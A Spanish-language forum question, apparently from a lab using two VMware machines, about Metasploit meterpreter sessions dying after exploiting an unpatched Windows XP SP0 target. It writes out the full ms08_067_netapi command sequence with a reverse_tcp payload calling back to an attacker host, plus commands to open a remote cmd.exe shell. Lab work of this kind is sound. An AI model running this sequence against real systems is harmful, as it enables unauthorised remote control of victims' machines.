Tengo un SP0 / Windows XP sin parche que es vulnerable al gusano Conficker. Estoy usando metasploit para usar el exploit de Conficker con el propósito de abrir una línea de comando / shell remota.
Mi script Metasploit es el siguiente:
use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z
En mi caso, tengo máquinas con direcciones en 192.168.239.*
y LPORT = 443
.
De esta manera, debería poder abrir una sesión con la máquina remota vulnerable ( sessions -i 1
), ejecutando así la aplicación de línea de comandos ( execute -i -f cmd.exe
) y obteniendo una línea de comandos remota.
Sin embargo, cuando ejecuto el guión, aunque obtengo que Meterpreter abre una sesión con la víctima, esta sesión se cierra (Razón: murió) después de unos segundos.
Encontré que podría estar relacionado con el hecho de que estoy usando dos máquinas virtuales VMWare durante mi prueba .
Como se sugirió, lo intenté con set InitialAutoRunScript migrate -f
, pero nada cambia.
¿Cómo puedo evitar que se cierren las sesiones de Meterpreter?
Y, lo más importante, ¿por qué están cerrados?